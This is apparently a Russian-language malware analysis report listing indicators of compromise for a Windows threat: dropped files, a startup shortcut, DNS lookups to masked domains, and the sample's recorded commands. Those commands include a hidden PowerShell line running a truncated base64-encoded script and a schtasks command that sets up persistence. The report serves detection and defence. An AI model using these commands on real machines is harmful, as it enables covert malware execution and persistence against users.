Техническая информация
- <SYSTEM32>\tasks\windowsapplicationservice
- %APPDATA%\microsoft\windows\start menu\programs\startup\windowsapplicationservice.lnk
- C:\users\public\libraries\thumbcache_64.db
- C:\users\public\libraries\thumbcache_64.db
- DNS ASK ge##.###gmonthairsalon.com
- DNS ASK ag####kxmdqy.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHd6eXZieXRzemYgPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoIC...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHd6eXZieXRzemYgPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoIC...
- '<SYSTEM32>\schtasks.exe' /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 15 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
- '<SYSTEM32>\taskeng.exe' {AB68E26A-1FFF-4FCD-9E71-AD7671A8E702} S-1-5-21-1960123792-2022915161-3775307078-1001:jcoahqkeriuw\user:Interactive:[1]